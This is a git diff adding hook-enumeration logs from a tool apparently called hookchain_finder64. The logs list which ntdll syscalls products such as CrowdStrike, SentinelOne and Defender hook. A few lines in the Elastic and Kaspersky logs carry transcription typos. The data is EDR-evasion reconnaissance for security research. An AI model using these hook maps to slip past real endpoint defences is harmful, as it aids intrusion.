+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCP90.dll is loaded at 0x0000000050bb0000.
+C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_08e1c10da83fbc83\MSVCR90.dll is loaded at 0x0000000050b00000.
+C:\Windows\SYSTEM32\ODBC32.dll is loaded at 0x00007ffa991a0000.
+C:\Windows\System32\CRYPT32.dll is loaded at 0x00007ffaaac80000.
+C:\Windows\SYSTEM32\SSPICLI.DLL is loaded at 0x00007ffaaa670000.
+C:\Windows\SYSTEM32\DPAPI.DLL is loaded at 0x00007ffaaa4e0000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ffaab0e0000.
+C:\Windows\SYSTEM32\windows.storage.dll is loaded at 0x00007ffaa8780000.
+C:\Windows\System32\combase.dll is loaded at 0x00007ffaab910000.
+C:\Windows\SYSTEM32\Wldp.dll is loaded at 0x00007ffaaa130000.
+C:\Windows\System32\SHCORE.dll is loaded at 0x00007ffaabe60000.
+C:\Windows\System32\shlwapi.dll is loaded at 0x00007ffaaca90000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ffaa9030000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphusr64.dll is loaded at 0x00007ffa88520000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SBA_ISWWH.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at cphnt64.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at WS2_32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SHELL32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at Secur32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at WINSPOOL.DRV IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ODBC32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at CRYPT32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SSPICLI.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at DPAPI.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at windows.storage.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at combase.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at Wldp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SHCORE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at shlwapi.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ntmarta.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at cphusr64.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/cortex.txt b/enum/results_enum/cortex.txt
new file mode 100644
index 0000000..79832dd
--- /dev/null
+++ b/enum/results_enum/cortex.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff666a00000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8a6130000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8a5e90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8a5b90000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8a0fd0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8a4130000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/crowdstrike.txt b/enum/results_enum/crowdstrike.txt
new file mode 100644
index 0000000..e25e4bf
--- /dev/null
+++ b/enum/results_enum/crowdstrike.txt
@@ -0,0 +1,55 @@
+[+] Listing ntdll Nt/Zw functions
+NtAllocateVirtualMemory is hooked
+NtAllocateVirtualMemoryEx is hooked
+NtCreateMutant is hooked
+NtDeviceIoControlFile is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendThread is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+[+] Listing loaded modules
+C:\Users\lab\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6bf510000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff95f1d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff95e4e0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff95c510000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959860000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff95ef80000.
+C:\Windows\System32\umppc18110.dll is loaded at 0x0000021457050000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at umppc18110.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/defender.txt b/enum/results_enum/defender.txt
new file mode 100644
index 0000000..a2f9c08
--- /dev/null
+++ b/enum/results_enum/defender.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff77bc30000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8ee910000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8eca90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8ec590000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8e9720000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8ee290000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/defender_atp.txt b/enum/results_enum/defender_atp.txt
new file mode 100644
index 0000000..b220b52
--- /dev/null
+++ b/enum/results_enum/defender_atp.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff73b750000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffce6370000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffce4b50000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffce3b30000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffce1160000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffce6070000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/elastic.txt b/enum/results_enum/elastic.txt
new file mode 100644
index 0000000..6b998f3
--- /dev/null
+++ b/enum/results_enum/elastic.txt
@@ -0,0 +1,29 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff647010000.
+C: \Windows \System32\KERNEL32.DLL is loaded at 0x00007f95d0a0000.
+C: \Windows\System32\KERNELBASE.dl1 is loaded at 0x00007f95bd90000.
+C: \Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959060000.
+C: \Windows\System32\msvert.dll is loaded at 0x00007ff95c450000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvert.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/eset.txt b/enum/results_enum/eset.txt
new file mode 100644
index 0000000..1996d6c
--- /dev/null
+++ b/enum/results_enum/eset.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7ed380000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffe3be50000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffe39f90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffe39640000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffe36de0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffe3bb20000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/kaspersky.txt b/enum/results_enum/kaspersky.txt
new file mode 100644
index 0000000..bdc3315
--- /dev/null
+++ b/enum/results_enum/kaspersky.txt
@@ -0,0 +1,27 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6c3400000.
+C:\Windows\System32\ntdll.dll is loaded at 0x00007f9e3930000.
+C:\Windows\System32\KERNEL32.DLL is loaded at exe0007ff9e3210000.
+C:\Windows\System32\KERNELBASE.dl1 is loaded at 0x00007ff9e1640000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff9elae0000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
diff --git a/enum/results_enum/malwarebytes.txt b/enum/results_enum/malwarebytes.txt
new file mode 100644
index 0000000..0eb98ac
--- /dev/null
+++ b/enum/results_enum/malwarebytes.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6e2cc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb55570000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb55470000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb53020000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb504f0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb539e0000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/sentinelone.txt b/enum/results_enum/sentinelone.txt
new file mode 100644
index 0000000..03692a5
--- /dev/null
+++ b/enum/results_enum/sentinelone.txt
@@ -0,0 +1,445 @@
+[+] Listing ntdll Nt/Zw functions
+NtCreateThreadEx is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtFreeVirtualMemory is hooked
+NtLoadDriver is hooked
+NtMapUserPhysicalPages is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff770d10000.
+C:\WINDOWS\SYSTEM32\ntd1l.dll is loaded at 0x0000015158f10000.
+C:\WINDOWS\System32\kern3l32.dll is loaded at 0x0000015159110000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff9e1290000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff9e0250000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff9de950000.
+C:\Program Files\SentinelOne\Sentinel Agent\InProcessClient64.dll is loaded at 0x00007ff9de4d0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ff9e0780000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff9df9a0000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ff9e0530000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ff9df2d0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ff9decc0000.
+C:\WINDOWS\SYSTEM32\FLTLIB.DLL is loaded at 0x00007ff9de460000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ff9defb0000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtMapUserPhysicalPagesScatter is hooked to 0x00007ff9e132d030
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtRaiseHardError is hooked to 0x00007ff9e132fce0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtReplacePartitionUnit is hooked to 0x00007ff9e132fea0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtIsSystemResumeAutomatic is hooked to 0x00007ff9e132f020
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtInitiatePowerAction is hooked to 0x00007ff9e132f000
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationDebugObject is hooked to 0x00007ff9e13302a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFindAtom is hooked to 0x00007ff9e132d250
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationAtom is hooked to 0x00007ff9e132f8c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAddAtomEx is hooked to 0x00007ff9e132dce0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteAtom is hooked to 0x00007ff9e132e9c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFlushKey is hooked to 0x00007ff9e132ed00
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobSet is hooked to 0x00007ff9e132e5a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationJobObject is hooked to 0x00007ff9e13302e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationJobObject is hooked to 0x00007ff9e132f920
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobObject is hooked to 0x00007ff9e132e580
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAssignProcessToJobObject is hooked to 0x00007ff9e132e1a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtTerminateJobObject is hooked to 0x00007ff9e13307e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenJobObject is hooked to 0x00007ff9e132f3c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetEaFile is hooked to 0x00007ff9e1330220
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateMailslotFile is hooked to 0x00007ff9e132e620
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtPowerInformation is hooked to 0x00007ff9e132dba0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtGetDevicePowerState is hooked to 0x00007ff9e132ee80
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetThreadExecutionState is hooked to 0x00007ff9e13305a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemEnvironmentValueEx is hooked to 0x00007ff9e1330520
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySystemEnvironmentValueEx is hooked to 0x00007ff9e132fbe0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetVolumeInformationFile is hooked to 0x00007ff9e1330640
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryAttributesFile is hooked to 0x00007ff9e132d770
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryFullAttributesFile is hooked to 0x00007ff9e132f8a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetTimerResolution is hooked to 0x00007ff9e1330600
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryTimerResolution is hooked to 0x00007ff9e132fc20
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtApphelpCacheControl is hooked to 0x00007ff9e132d950
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ +-- 81 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeDirectoryFileEx is hooked to 0x00007ff9e132f2e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCopyFileChunk is hooked to 0x00007ff9e132e420
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFlushBuffersFile is hooked to 0x00007ff9e132d930
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenMutant is hooked to 0x00007ff9e132f460
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseMutant is hooked to 0x00007ff9e132d3d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKeyTransacted is hooked to 0x00007ff9e132e5c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetDefaultLocale is hooked to 0x00007ff9e13301c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetNlsSectionPtr is hooked to 0x00007ff9e132ef00
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDefaultLocale is hooked to 0x00007ff9e132d270
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeKey is hooked to 0x00007ff9e132f300
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
